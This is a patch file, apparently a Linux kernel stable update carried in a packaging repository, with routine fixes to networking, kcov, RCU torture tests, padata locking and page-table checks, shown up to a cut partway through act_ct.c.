+diff --git a/include/linux/kcov.h b/include/linux/kcov.h
+index 55dc338f6bcdd..492af783eb9b4 100644
+--- a/include/linux/kcov.h
++++ b/include/linux/kcov.h
+@@ -21,6 +21,8 @@ enum kcov_mode {
+ 	KCOV_MODE_TRACE_PC = 2,
+ 	/* Collecting comparison operands mode. */
+ 	KCOV_MODE_TRACE_CMP = 3,
++	/* The process owns a KCOV remote reference. */
++	KCOV_MODE_REMOTE = 4,
+ };
+ 
+ #define KCOV_IN_CTXSW	(1 << 30)
+diff --git a/include/linux/mod_devicetable.h b/include/linux/mod_devicetable.h
+index 549590e9c644d..a18b7b43fbbbf 100644
+--- a/include/linux/mod_devicetable.h
++++ b/include/linux/mod_devicetable.h
+@@ -676,6 +676,8 @@ struct x86_cpu_id {
+ 	__u16 model;
+ 	__u16 steppings;
+ 	__u16 feature;	/* bit index */
++	/* Solely for kernel-internal use: DO NOT EXPORT to userspace! */
++	__u16 flags;
+ 	kernel_ulong_t driver_data;
+ };
+ 
+diff --git a/include/linux/tty_driver.h b/include/linux/tty_driver.h
+index e00034118c7bc..1df868130adce 100644
+--- a/include/linux/tty_driver.h
++++ b/include/linux/tty_driver.h
+@@ -155,6 +155,13 @@ struct serial_struct;
+  *
+  *	Optional. Called under the @tty->termios_rwsem. May sleep.
+  *
++ * @ldisc_ok: ``int ()(struct tty_struct *tty, int ldisc)``
++ *
++ *	This routine allows the @tty driver to decide if it can deal
++ *	with a particular @ldisc.
++ *
++ *	Optional. Called under the @tty->ldisc_sem and @tty->termios_rwsem.
++ *
+  * @set_ldisc: ``void ()(struct tty_struct *tty)``
+  *
+  *	This routine allows the @tty driver to be notified when the device's
+@@ -374,6 +381,7 @@ struct tty_operations {
+ 	void (*hangup)(struct tty_struct *tty);
+ 	int (*break_ctl)(struct tty_struct *tty, int state);
+ 	void (*flush_buffer)(struct tty_struct *tty);
++	int (*ldisc_ok)(struct tty_struct *tty, int ldisc);
+ 	void (*set_ldisc)(struct tty_struct *tty);
+ 	void (*wait_until_sent)(struct tty_struct *tty, int timeout);
+ 	void (*send_xchar)(struct tty_struct *tty, char ch);
+diff --git a/include/net/sch_generic.h b/include/net/sch_generic.h
+index b3e3128402961..aefdb080ad3d2 100644
+--- a/include/net/sch_generic.h
++++ b/include/net/sch_generic.h
+@@ -126,6 +126,7 @@ struct Qdisc {
+ 
+ 	struct rcu_head		rcu;
+ 	netdevice_tracker	dev_tracker;
++	struct lock_class_key	root_lock_key;
+ 	/* private data */
+ 	long privdata[] ____cacheline_aligned;
+ };
+diff --git a/io_uring/sqpoll.c b/io_uring/sqpoll.c
+index 7b6facf529b8d..11610a70573ab 100644
+--- a/io_uring/sqpoll.c
++++ b/io_uring/sqpoll.c
+@@ -235,6 +235,14 @@ static int io_sq_thread(void *data)
+ 		set_cpus_allowed_ptr(current, cpu_online_mask);
+ 	current->flags |= PF_NO_SETAFFINITY;
+ 
++	/*
++	 * Force audit context to get setup, in case we do prep side async
++	 * operations that would trigger an audit call before any issue side
++	 * audit has been done.
++	 */
++	audit_uring_entry(IORING_OP_NOP);
++	audit_uring_exit(true, 0);
++
+ 	mutex_lock(&sqd->lock);
+ 	while (1) {
+ 		bool cap_entries, sqt_spin = false;
+diff --git a/kernel/gcov/gcc_4_7.c b/kernel/gcov/gcc_4_7.c
+index 74a4ef1da9ad7..fd75b4a484d76 100644
+--- a/kernel/gcov/gcc_4_7.c
++++ b/kernel/gcov/gcc_4_7.c
+@@ -18,7 +18,9 @@
+ #include <linux/mm.h>
+ #include "gcov.h"
+ 
+-#if (__GNUC__ >= 10)
++#if (__GNUC__ >= 14)
++#define GCOV_COUNTERS			9
++#elif (__GNUC__ >= 10)
+ #define GCOV_COUNTERS			8
+ #elif (__GNUC__ >= 7)
+ #define GCOV_COUNTERS			9
+diff --git a/kernel/gen_kheaders.sh b/kernel/gen_kheaders.sh
+index 473036b43c832..12bcd08fe79d4 100755
+--- a/kernel/gen_kheaders.sh
++++ b/kernel/gen_kheaders.sh
+@@ -81,12 +81,9 @@ find $cpio_dir -type f -print0 |
+ 	xargs -0 -P8 -n1 perl -pi -e 'BEGIN {undef $/;}; s/\/\*((?!SPDX).)*?\*\///smg;'
+ 
+ # Create archive and try to normalize metadata for reproducibility.
+-# For compatibility with older versions of tar, files are fed to tar
+-# pre-sorted, as --sort=name might not be available.
+-find $cpio_dir -printf "./%P\n" | LC_ALL=C sort | \
+-    tar "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}" \
+-    --owner=0 --group=0 --numeric-owner --no-recursion \
+-    -I $XZ -cf $tarfile -C $cpio_dir/ -T - > /dev/null
++tar "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}" \
++    --owner=0 --group=0 --sort=name --numeric-owner --mode=u=rw,go=r,a+X \
++    -I $XZ -cf $tarfile -C $cpio_dir/ . > /dev/null
+ 
+ echo $headers_md5 > kernel/kheaders.md5
+ echo "$this_file_md5" >> kernel/kheaders.md5
+diff --git a/kernel/kcov.c b/kernel/kcov.c
+index e5cd09fd8a050..fe3308dfd6a73 100644
+--- a/kernel/kcov.c
++++ b/kernel/kcov.c
+@@ -630,6 +630,7 @@ static int kcov_ioctl_locked(struct kcov *kcov, unsigned int cmd,
+ 			return -EINVAL;
+ 		kcov->mode = mode;
+ 		t->kcov = kcov;
++	        t->kcov_mode = KCOV_MODE_REMOTE;
+ 		kcov->t = t;
+ 		kcov->remote = true;
+ 		kcov->remote_size = remote_arg->area_size;
+diff --git a/kernel/padata.c b/kernel/padata.c
+index 7bef7dae3db54..0261bced7eb6e 100644
+--- a/kernel/padata.c
++++ b/kernel/padata.c
+@@ -98,7 +98,7 @@ static int __init padata_work_alloc_mt(int nworks, void *data,
+ {
+ 	int i;
+ 
+-	spin_lock(&padata_works_lock);
++	spin_lock_bh(&padata_works_lock);
+ 	/* Start at 1 because the current task participates in the job. */
+ 	for (i = 1; i < nworks; ++i) {
+ 		struct padata_work *pw = padata_work_alloc();
+@@ -108,7 +108,7 @@ static int __init padata_work_alloc_mt(int nworks, void *data,
+ 		padata_work_init(pw, padata_mt_helper, data, 0);
+ 		list_add(&pw->pw_list, head);
+ 	}
+-	spin_unlock(&padata_works_lock);
++	spin_unlock_bh(&padata_works_lock);
+ 
+ 	return i;
+ }
+@@ -126,12 +126,12 @@ static void __init padata_works_free(struct list_head *works)
+ 	if (list_empty(works))
+ 		return;
+ 
+-	spin_lock(&padata_works_lock);
++	spin_lock_bh(&padata_works_lock);
+ 	list_for_each_entry_safe(cur, next, works, pw_list) {
+ 		list_del(&cur->pw_list);
+ 		padata_work_free(cur);
+ 	}
+-	spin_unlock(&padata_works_lock);
++	spin_unlock_bh(&padata_works_lock);
+ }
+ 
+ static void padata_parallel_worker(struct work_struct *parallel_work)
+diff --git a/kernel/rcu/rcutorture.c b/kernel/rcu/rcutorture.c
+index 503c2aa845a4a..8c45df910763a 100644
+--- a/kernel/rcu/rcutorture.c
++++ b/kernel/rcu/rcutorture.c
+@@ -1946,7 +1946,8 @@ static bool rcu_torture_one_read(struct torture_random_state *trsp, long myid)
+ 	preempt_disable();
+ 	pipe_count = READ_ONCE(p->rtort_pipe_count);
+ 	if (pipe_count > RCU_TORTURE_PIPE_LEN) {
+-		/* Should not happen, but... */
++		// Should not happen in a correct RCU implementation,
++		// happens quite often for torture_type=busted.
+ 		pipe_count = RCU_TORTURE_PIPE_LEN;
+ 	}
+ 	completed = cur_ops->get_gp_seq();
+@@ -2418,8 +2419,8 @@ static int rcu_torture_stall(void *args)
+ 			preempt_disable();
+ 		pr_alert("%s start on CPU %d.\n",
+ 			  __func__, raw_smp_processor_id());
+-		while (ULONG_CMP_LT((unsigned long)ktime_get_seconds(),
+-				    stop_at))
++		while (ULONG_CMP_LT((unsigned long)ktime_get_seconds(), stop_at) &&
++		       !kthread_should_stop())
+ 			if (stall_cpu_block) {
+ #ifdef CONFIG_PREEMPTION
+ 				preempt_schedule();
+@@ -2967,11 +2968,12 @@ static void rcu_torture_barrier_cbf(struct rcu_head *rcu)
+ }
+ 
+ /* IPI handler to get callback posted on desired CPU, if online. */
+-static void rcu_torture_barrier1cb(void *rcu_void)
++static int rcu_torture_barrier1cb(void *rcu_void)
+ {
+ 	struct rcu_head *rhp = rcu_void;
+ 
+ 	cur_ops->call(rhp, rcu_torture_barrier_cbf);
++	return 0;
+ }
+ 
+ /* kthread function to register callbacks used to test RCU barriers. */
+@@ -2997,11 +2999,9 @@ static int rcu_torture_barrier_cbs(void *arg)
+ 		 * The above smp_load_acquire() ensures barrier_phase load
+ 		 * is ordered before the following ->call().
+ 		 */
+-		if (smp_call_function_single(myid, rcu_torture_barrier1cb,
+-					     &rcu, 1)) {
+-			// IPI failed, so use direct call from current CPU.
++		if (smp_call_on_cpu(myid, rcu_torture_barrier1cb, &rcu, 1))
+ 			cur_ops->call(&rcu, rcu_torture_barrier_cbf);
+-		}
++
+ 		if (atomic_dec_and_test(&barrier_cbs_count))
+ 			wake_up(&barrier_wq);
+ 	} while (!torture_must_stop());
+diff --git a/kernel/trace/Kconfig b/kernel/trace/Kconfig
+index 93d7249962833..e3a549239cb4e 100644
+--- a/kernel/trace/Kconfig
++++ b/kernel/trace/Kconfig
+@@ -1068,7 +1068,7 @@ config PREEMPTIRQ_DELAY_TEST
+ 
+ config SYNTH_EVENT_GEN_TEST
+ 	tristate "Test module for in-kernel synthetic event generation"
+-	depends on SYNTH_EVENTS
++	depends on SYNTH_EVENTS && m
+ 	help
+           This option creates a test module to check the base
+           functionality of in-kernel synthetic event definition and
+@@ -1081,7 +1081,7 @@ config SYNTH_EVENT_GEN_TEST
+ 
+ config KPROBE_EVENT_GEN_TEST
+ 	tristate "Test module for in-kernel kprobe event generation"
+-	depends on KPROBE_EVENTS
++	depends on KPROBE_EVENTS && m
+ 	help
+           This option creates a test module to check the base
+           functionality of in-kernel kprobe event definition.
+diff --git a/kernel/trace/preemptirq_delay_test.c b/kernel/trace/preemptirq_delay_test.c
+index 8c4ffd0761624..cb0871fbdb07f 100644
+--- a/kernel/trace/preemptirq_delay_test.c
++++ b/kernel/trace/preemptirq_delay_test.c
+@@ -215,4 +215,5 @@ static void __exit preemptirq_delay_exit(void)
+ 
+ module_init(preemptirq_delay_init)
+ module_exit(preemptirq_delay_exit)
++MODULE_DESCRIPTION("Preempt / IRQ disable delay thread to test latency tracers");
+ MODULE_LICENSE("GPL v2");
+diff --git a/mm/page_table_check.c b/mm/page_table_check.c
+index 4d05065376213..9392544d4754e 100644
+--- a/mm/page_table_check.c
++++ b/mm/page_table_check.c
+@@ -70,6 +70,9 @@ static void page_table_check_clear(struct mm_struct *mm, unsigned long addr,
+ 	page = pfn_to_page(pfn);
+ 	page_ext = page_ext_get(page);
+ 
++	if (!page_ext)
++		return;
++
+ 	BUG_ON(PageSlab(page));
+ 	anon = PageAnon(page);
+ 
+@@ -108,6 +111,9 @@ static void page_table_check_set(struct mm_struct *mm, unsigned long addr,
+ 	page = pfn_to_page(pfn);
+ 	page_ext = page_ext_get(page);
+ 
++	if (!page_ext)
++		return;
++
+ 	BUG_ON(PageSlab(page));
+ 	anon = PageAnon(page);
+ 
+@@ -138,7 +144,10 @@ void __page_table_check_zero(struct page *page, unsigned int order)
+ 	BUG_ON(PageSlab(page));
+ 
+ 	page_ext = page_ext_get(page);
+-	BUG_ON(!page_ext);
++
++	if (!page_ext)
++		return;
++
+ 	for (i = 0; i < (1ul << order); i++) {
+ 		struct page_table_check *ptc = get_page_table_check(page_ext);
+ 
+diff --git a/net/batman-adv/originator.c b/net/batman-adv/originator.c
+index 34903df4fe936..dafef3a78ad5d 100644
+--- a/net/batman-adv/originator.c
++++ b/net/batman-adv/originator.c
+@@ -1238,6 +1238,8 @@ void batadv_purge_orig_ref(struct batadv_priv *bat_priv)
+ 	/* for all origins... */
+ 	for (i = 0; i < hash->size; i++) {
+ 		head = &hash->table[i];
++		if (hlist_empty(head))
++			continue;
+ 		list_lock = &hash->list_locks[i];
+ 
+ 		spin_lock_bh(list_lock);
+diff --git a/net/core/drop_monitor.c b/net/core/drop_monitor.c
+index 8e0a90b45df22..522657b597d9f 100644
+--- a/net/core/drop_monitor.c
++++ b/net/core/drop_monitor.c
+@@ -72,7 +72,7 @@ struct net_dm_hw_entries {
+ };
+ 
+ struct per_cpu_dm_data {
+-	spinlock_t		lock;	/* Protects 'skb', 'hw_entries' and
++	raw_spinlock_t		lock;	/* Protects 'skb', 'hw_entries' and
+ 					 * 'send_timer'
+ 					 */
+ 	union {
+@@ -166,9 +166,9 @@ static struct sk_buff *reset_per_cpu_data(struct per_cpu_dm_data *data)
+ err:
+ 	mod_timer(&data->send_timer, jiffies + HZ / 10);
+ out:
+-	spin_lock_irqsave(&data->lock, flags);
++	raw_spin_lock_irqsave(&data->lock, flags);
+ 	swap(data->skb, skb);
+-	spin_unlock_irqrestore(&data->lock, flags);
++	raw_spin_unlock_irqrestore(&data->lock, flags);
+ 
+ 	if (skb) {
+ 		struct nlmsghdr *nlh = (struct nlmsghdr *)skb->data;
+@@ -223,7 +223,7 @@ static void trace_drop_common(struct sk_buff *skb, void *location)
+ 
+ 	local_irq_save(flags);
+ 	data = this_cpu_ptr(&dm_cpu_data);
+-	spin_lock(&data->lock);
++	raw_spin_lock(&data->lock);
+ 	dskb = data->skb;
+ 
+ 	if (!dskb)
+@@ -257,7 +257,7 @@ static void trace_drop_common(struct sk_buff *skb, void *location)
+ 	}
+ 
+ out:
+-	spin_unlock_irqrestore(&data->lock, flags);
++	raw_spin_unlock_irqrestore(&data->lock, flags);
+ }
+ 
+ static void trace_kfree_skb_hit(void *ignore, struct sk_buff *skb,
+@@ -312,9 +312,9 @@ net_dm_hw_reset_per_cpu_data(struct per_cpu_dm_data *hw_data)
+ 		mod_timer(&hw_data->send_timer, jiffies + HZ / 10);
+ 	}
+ 
+-	spin_lock_irqsave(&hw_data->lock, flags);
++	raw_spin_lock_irqsave(&hw_data->lock, flags);
+ 	swap(hw_data->hw_entries, hw_entries);
+-	spin_unlock_irqrestore(&hw_data->lock, flags);
++	raw_spin_unlock_irqrestore(&hw_data->lock, flags);
+ 
+ 	return hw_entries;
+ }
+@@ -446,7 +446,7 @@ net_dm_hw_trap_summary_probe(void *ignore, const struct devlink *devlink,
+ 		return;
+ 
+ 	hw_data = this_cpu_ptr(&dm_hw_cpu_data);
+-	spin_lock_irqsave(&hw_data->lock, flags);
++	raw_spin_lock_irqsave(&hw_data->lock, flags);
+ 	hw_entries = hw_data->hw_entries;
+ 
+ 	if (!hw_entries)
+@@ -475,7 +475,7 @@ net_dm_hw_trap_summary_probe(void *ignore, const struct devlink *devlink,
+ 	}
+ 
+ out:
+-	spin_unlock_irqrestore(&hw_data->lock, flags);
++	raw_spin_unlock_irqrestore(&hw_data->lock, flags);
+ }
+ 
+ static const struct net_dm_alert_ops net_dm_alert_summary_ops = {
+@@ -1658,7 +1658,7 @@ static struct notifier_block dropmon_net_notifier = {
+ 
+ static void __net_dm_cpu_data_init(struct per_cpu_dm_data *data)
+ {
+-	spin_lock_init(&data->lock);
++	raw_spin_lock_init(&data->lock);
+ 	skb_queue_head_init(&data->drop_queue);
+ 	u64_stats_init(&data->stats.syncp);
+ }
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 1d8b271ef8cc2..7a07413913538 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -1655,6 +1655,11 @@ static DEFINE_PER_CPU(struct bpf_scratchpad, bpf_sp);
+ static inline int __bpf_try_make_writable(struct sk_buff *skb,
+ 					  unsigned int write_len)
+ {
++#ifdef CONFIG_DEBUG_NET
++	/* Avoid a splat in pskb_may_pull_reason() */
++	if (write_len > INT_MAX)
++		return -EINVAL;
++#endif
+ 	return skb_ensure_writable(skb, write_len);
+ }
+ 
+diff --git a/net/core/net_namespace.c b/net/core/net_namespace.c
+index c33930a171629..1d95a5adce4ec 100644
+--- a/net/core/net_namespace.c
++++ b/net/core/net_namespace.c
+@@ -657,11 +657,16 @@ EXPORT_SYMBOL_GPL(__put_net);
+  * get_net_ns - increment the refcount of the network namespace
+  * @ns: common namespace (net)
+  *
+- * Returns the net's common namespace.
++ * Returns the net's common namespace or ERR_PTR() if ref is zero.
+  */
+ struct ns_common *get_net_ns(struct ns_common *ns)
+ {
+-	return &get_net(container_of(ns, struct net, ns))->ns;
++	struct net *net;
++
++	net = maybe_get_net(container_of(ns, struct net, ns));
++	if (net)
++		return &net->ns;
++	return ERR_PTR(-EINVAL);
+ }
+ EXPORT_SYMBOL_GPL(get_net_ns);
+ 
+diff --git a/net/core/netpoll.c b/net/core/netpoll.c
+index 4ac8d0ad9f6fc..fd2195cfcb4aa 100644
+--- a/net/core/netpoll.c
++++ b/net/core/netpoll.c
+@@ -316,7 +316,7 @@ static int netpoll_owner_active(struct net_device *dev)
+ 	struct napi_struct *napi;
+ 
+ 	list_for_each_entry_rcu(napi, &dev->napi_list, dev_list) {
+-		if (napi->poll_owner == smp_processor_id())
++		if (READ_ONCE(napi->poll_owner) == smp_processor_id())
+ 			return 1;
+ 	}
+ 	return 0;
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 48199e6e8f161..dce8f878f6385 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -3695,6 +3695,9 @@ void sk_common_release(struct sock *sk)
+ 
+ 	sk->sk_prot->unhash(sk);
+ 
++	if (sk->sk_socket)
++		sk->sk_socket->sk = NULL;
++
+ 	/*
+ 	 * In this point socket cannot receive new packets, but it is possible
+ 	 * that some packets are in flight because some CPU runs receiver and
+diff --git a/net/ipv4/cipso_ipv4.c b/net/ipv4/cipso_ipv4.c
+index 6cd3b6c559f05..2b56cabe4da98 100644
+--- a/net/ipv4/cipso_ipv4.c
++++ b/net/ipv4/cipso_ipv4.c
+@@ -2015,12 +2015,16 @@ static int cipso_v4_delopt(struct ip_options_rcu __rcu **opt_ptr)
+ 		 * from there we can determine the new total option length */
+ 		iter = 0;
+ 		optlen_new = 0;
+-		while (iter < opt->opt.optlen)
+-			if (opt->opt.__data[iter] != IPOPT_NOP) {
++		while (iter < opt->opt.optlen) {
++			if (opt->opt.__data[iter] == IPOPT_END) {
++				break;
++			} else if (opt->opt.__data[iter] == IPOPT_NOP) {
++				iter++;
++			} else {
+ 				iter += opt->opt.__data[iter + 1];
+ 				optlen_new = iter;
+-			} else
+-				iter++;
++			}
++		}
+ 		hdr_delta = opt->opt.optlen;
+ 		opt->opt.optlen = (optlen_new + 3) & ~3;
+ 		hdr_delta -= opt->opt.optlen;
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 4c9da94553365..d85dd394d5b44 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -6146,6 +6146,7 @@ static bool tcp_rcv_fastopen_synack(struct sock *sk, struct sk_buff *synack,
+ 		skb_rbtree_walk_from(data)
+ 			 tcp_mark_skb_lost(sk, data);
+ 		tcp_xmit_retransmit_queue(sk);
++		tp->retrans_stamp = 0;
+ 		NET_INC_STATS(sock_net(sk),
+ 				LINUX_MIB_TCPFASTOPENACTIVEFAIL);
+ 		return true;
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index d305051e8ab5f..151414e9f7fe4 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -640,6 +640,8 @@ static void rt6_probe(struct fib6_nh *fib6_nh)
+ 	rcu_read_lock();
+ 	last_probe = READ_ONCE(fib6_nh->last_probe);
+ 	idev = __in6_dev_get(dev);
++	if (!idev)
++		goto out;
+ 	neigh = __ipv6_neigh_lookup_noref(dev, nh_gw);
+ 	if (neigh) {
+ 		if (READ_ONCE(neigh->nud_state) & NUD_VALID)
+@@ -3592,7 +3594,7 @@ int fib6_nh_init(struct net *net, struct fib6_nh *fib6_nh,
+ 	if (!dev)
+ 		goto out;
+ 
+-	if (idev->cnf.disable_ipv6) {
++	if (!idev || idev->cnf.disable_ipv6) {
+ 		NL_SET_ERR_MSG(extack, "IPv6 is disabled on nexthop device");
+ 		err = -EACCES;
+ 		goto out;
+diff --git a/net/ipv6/seg6_local.c b/net/ipv6/seg6_local.c
+index 8370726ae7bf1..33cb0381b5749 100644
+--- a/net/ipv6/seg6_local.c
++++ b/net/ipv6/seg6_local.c
+@@ -554,8 +554,8 @@ static int input_action_end_dx6(struct sk_buff *skb,
+ 
+ 	if (static_branch_unlikely(&nf_hooks_lwtunnel_enabled))
+ 		return NF_HOOK(NFPROTO_IPV6, NF_INET_PRE_ROUTING,
+-			       dev_net(skb->dev), NULL, skb, NULL,
+-			       skb_dst(skb)->dev, input_action_end_dx6_finish);
++			       dev_net(skb->dev), NULL, skb, skb->dev,
++			       NULL, input_action_end_dx6_finish);
+ 
+ 	return input_action_end_dx6_finish(dev_net(skb->dev), NULL, skb);
+ drop:
+@@ -604,8 +604,8 @@ static int input_action_end_dx4(struct sk_buff *skb,
+ 
+ 	if (static_branch_unlikely(&nf_hooks_lwtunnel_enabled))
+ 		return NF_HOOK(NFPROTO_IPV4, NF_INET_PRE_ROUTING,
+-			       dev_net(skb->dev), NULL, skb, NULL,
+-			       skb_dst(skb)->dev, input_action_end_dx4_finish);
++			       dev_net(skb->dev), NULL, skb, skb->dev,
++			       NULL, input_action_end_dx4_finish);
+ 
+ 	return input_action_end_dx4_finish(dev_net(skb->dev), NULL, skb);
+ drop:
+diff --git a/net/ipv6/xfrm6_policy.c b/net/ipv6/xfrm6_policy.c
+index f0053087d2e47..b7b5dbf5d037b 100644
+--- a/net/ipv6/xfrm6_policy.c
++++ b/net/ipv6/xfrm6_policy.c
+@@ -56,12 +56,18 @@ static int xfrm6_get_saddr(struct net *net, int oif,
+ {
+ 	struct dst_entry *dst;
+ 	struct net_device *dev;
++	struct inet6_dev *idev;
+ 
+ 	dst = xfrm6_dst_lookup(net, 0, oif, NULL, daddr, mark);
+ 	if (IS_ERR(dst))
+ 		return -EHOSTUNREACH;
+ 
+-	dev = ip6_dst_idev(dst)->dev;
++	idev = ip6_dst_idev(dst);
++	if (!idev) {
++		dst_release(dst);
++		return -EHOSTUNREACH;
++	}
++	dev = idev->dev;
+ 	ipv6_dev_get_saddr(dev_net(dev), dev, &daddr->in6, 0, &saddr->in6);
+ 	dst_release(dst);
+ 	return 0;
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index 649b8a5901e33..0b24b638bfd2e 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -53,12 +53,13 @@ MODULE_DESCRIPTION("core IP set support");
+ MODULE_ALIAS_NFNL_SUBSYS(NFNL_SUBSYS_IPSET);
+ 
+ /* When the nfnl mutex or ip_set_ref_lock is held: */
+-#define ip_set_dereference(p)		\
+-	rcu_dereference_protected(p,	\
++#define ip_set_dereference(inst)	\
++	rcu_dereference_protected((inst)->ip_set_list,	\
+ 		lockdep_nfnl_is_held(NFNL_SUBSYS_IPSET) || \
+-		lockdep_is_held(&ip_set_ref_lock))
++		lockdep_is_held(&ip_set_ref_lock) || \
++		(inst)->is_deleted)
+ #define ip_set(inst, id)		\
+-	ip_set_dereference((inst)->ip_set_list)[id]
++	ip_set_dereference(inst)[id]
+ #define ip_set_ref_netlink(inst,id)	\
+ 	rcu_dereference_raw((inst)->ip_set_list)[id]
+ #define ip_set_dereference_nfnl(p)	\
+@@ -1135,7 +1136,7 @@ static int ip_set_create(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if (!list)
+ 			goto cleanup;
+ 		/* nfnl mutex is held, both lists are valid */
+-		tmp = ip_set_dereference(inst->ip_set_list);
++		tmp = ip_set_dereference(inst);
+ 		memcpy(list, tmp, sizeof(struct ip_set *) * inst->ip_set_max);
+ 		rcu_assign_pointer(inst->ip_set_list, list);
+ 		/* Make sure all current packets have passed through */
+diff --git a/net/netrom/nr_timer.c b/net/netrom/nr_timer.c
+index 4e7c968cde2dc..5e3ca068f04e0 100644
+--- a/net/netrom/nr_timer.c
++++ b/net/netrom/nr_timer.c
+@@ -121,7 +121,8 @@ static void nr_heartbeat_expiry(struct timer_list *t)
+ 		   is accepted() it isn't 'dead' so doesn't get removed. */
+ 		if (sock_flag(sk, SOCK_DESTROY) ||
+ 		    (sk->sk_state == TCP_LISTEN && sock_flag(sk, SOCK_DEAD))) {
+-			sock_hold(sk);
++			if (sk->sk_state == TCP_LISTEN)
++				sock_hold(sk);
+ 			bh_unlock_sock(sk);
+ 			nr_destroy_socket(sk);
+ 			goto out;
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 8888c09931ce3..c48cb7664c552 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -3791,28 +3791,30 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 	case PACKET_TX_RING:
+ 	{
+ 		union tpacket_req_u req_u;
+-		int len;
+ 
++		ret = -EINVAL;
+ 		lock_sock(sk);
+ 		switch (po->tp_version) {
+ 		case TPACKET_V1:
+ 		case TPACKET_V2:
+-			len = sizeof(req_u.req);
++			if (optlen < sizeof(req_u.req))
++				break;
++			ret = copy_from_sockptr(&req_u.req, optval,
++						sizeof(req_u.req)) ?
++						-EINVAL : 0;
+ 			break;
+ 		case TPACKET_V3:
+ 		default:
+-			len = sizeof(req_u.req3);
++			if (optlen < sizeof(req_u.req3))
++				break;
++			ret = copy_from_sockptr(&req_u.req3, optval,
++						sizeof(req_u.req3)) ?
++						-EINVAL : 0;
+ 			break;
+ 		}
+-		if (optlen < len) {
+-			ret = -EINVAL;
+-		} else {
+-			if (copy_from_sockptr(&req_u.req, optval, len))
+-				ret = -EFAULT;
+-			else
+-				ret = packet_set_ring(sk, &req_u, 0,
+-						    optname == PACKET_TX_RING);
+-		}
++		if (!ret)
++			ret = packet_set_ring(sk, &req_u, 0,
++					      optname == PACKET_TX_RING);
+ 		release_sock(sk);
+ 		return ret;
+ 	}
+diff --git a/net/sched/act_api.c b/net/sched/act_api.c
+index b33f88e50aa90..5a361deb804a3 100644
+--- a/net/sched/act_api.c
++++ b/net/sched/act_api.c
+@@ -820,6 +820,9 @@ EXPORT_SYMBOL(tcf_idr_cleanup);
+  * its reference and bind counters, and return 1. Otherwise insert temporary
+  * error pointer (to prevent concurrent users from inserting actions with same
+  * index) and return 0.
++ *
++ * May return -EAGAIN for binding actions in case of a parallel add/delete on
++ * the requested index.
+  */
+ 
+ int tcf_idr_check_alloc(struct tc_action_net *tn, u32 *index,
+@@ -828,43 +831,60 @@ int tcf_idr_check_alloc(struct tc_action_net *tn, u32 *index,
+ 	struct tcf_idrinfo *idrinfo = tn->idrinfo;
+ 	struct tc_action *p;
+ 	int ret;
++	u32 max;
+ 
+-again:
+-	mutex_lock(&idrinfo->lock);
+ 	if (*index) {
++		rcu_read_lock();
+ 		p = idr_find(&idrinfo->action_idr, *index);
++
+ 		if (IS_ERR(p)) {
+ 			/* This means that another process allocated
+ 			 * index but did not assign the pointer yet.
+ 			 */
+-			mutex_unlock(&idrinfo->lock);
+-			goto again;
++			rcu_read_unlock();
++			return -EAGAIN;
+ 		}
+ 
+-		if (p) {
+-			refcount_inc(&p->tcfa_refcnt);
+-			if (bind)
+-				atomic_inc(&p->tcfa_bindcnt);
+-			*a = p;
+-			ret = 1;
+-		} else {
+-			*a = NULL;
+-			ret = idr_alloc_u32(&idrinfo->action_idr, NULL, index,
+-					    *index, GFP_KERNEL);
+-			if (!ret)
+-				idr_replace(&idrinfo->action_idr,
+-					    ERR_PTR(-EBUSY), *index);
++		if (!p) {
++			/* Empty slot, try to allocate it */
++			max = *index;
++			rcu_read_unlock();
++			goto new;
+ 		}
++
++		if (!refcount_inc_not_zero(&p->tcfa_refcnt)) {
++			/* Action was deleted in parallel */
++			rcu_read_unlock();
++			return -EAGAIN;
++		}
++
++		if (bind)
++			atomic_inc(&p->tcfa_bindcnt);
++		*a = p;
++
++		rcu_read_unlock();
++
++		return 1;
+ 	} else {
++		/* Find a slot */
+ 		*index = 1;
+-		*a = NULL;
+-		ret = idr_alloc_u32(&idrinfo->action_idr, NULL, index,
+-				    UINT_MAX, GFP_KERNEL);
+-		if (!ret)
+-			idr_replace(&idrinfo->action_idr, ERR_PTR(-EBUSY),
+-				    *index);
++		max = UINT_MAX;
+ 	}
++
++new:
++	*a = NULL;
++
++	mutex_lock(&idrinfo->lock);
++	ret = idr_alloc_u32(&idrinfo->action_idr, ERR_PTR(-EBUSY), index, max,
++			    GFP_KERNEL);
+ 	mutex_unlock(&idrinfo->lock);
++
++	/* N binds raced for action allocation,
++	 * retry for all the ones that failed.
++	 */
++	if (ret == -ENOSPC && *index == max)
++		ret = -EAGAIN;
++
+ 	return ret;
+ }
+ EXPORT_SYMBOL(tcf_idr_check_alloc);
+diff --git a/net/sched/act_ct.c b/net/sched/act_ct.c
+index 84e15116f18c2..cd95a315fde82 100644
+--- a/net/sched/act_ct.c
++++ b/net/sched/act_ct.c
+@@ -39,21 +39,26 @@ static struct workqueue_struct *act_ct_wq;
+ static struct rhashtable zones_ht;
+ static DEFINE_MUTEX(zones_mutex);
+ 
++struct zones_ht_key {
++	struct net *net;
++	u16 zone;
++};
++
+ struct tcf_ct_flow_table {
+ 	struct rhash_head node; /* In zones tables */
+ 
+ 	struct rcu_work rwork;
+ 	struct nf_flowtable nf_ft;
+ 	refcount_t ref;
+-	u16 zone;
++	struct zones_ht_key key;
+ 
+ 	bool dying;
+ };
+ 
+ static const struct rhashtable_params zones_params = {
+ 	.head_offset = offsetof(struct tcf_ct_flow_table, node),
